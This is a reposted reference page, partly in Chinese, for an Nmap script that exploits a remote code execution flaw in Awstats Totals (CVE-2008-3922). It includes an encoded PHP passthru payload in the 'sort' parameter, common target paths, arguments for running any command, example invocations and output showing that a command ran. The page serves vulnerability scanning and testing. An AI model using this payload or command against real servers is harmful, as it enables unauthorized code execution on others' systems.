http-awstatstotals-exec
脚本使用类型:
portrule
脚本所属分类:
vuln, intrusive, exploit
脚本下载地址: http://nmap.org/svn/scripts/http-awstatstotals-exec.nse
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function:
?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}
Common paths for Awstats Total:
/awstats/index.php
/awstatstotals/index.php
/awstats/awstatstotals.php
References:
Awstats Totals URI including path. Default: /index.php
Command to execute. Default: whoami
Output file. If set it saves the output in this file.
Other useful args when running this script: http.useragent - User Agent to use in GET request
执行格式
nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target> nmap -sV --script http-awstatstotals-exec.nse <target>
PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-awstatstotals-exec.nse: |_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
Author: Paulino Calderon
License: VER007 整理 http://www.ver007.com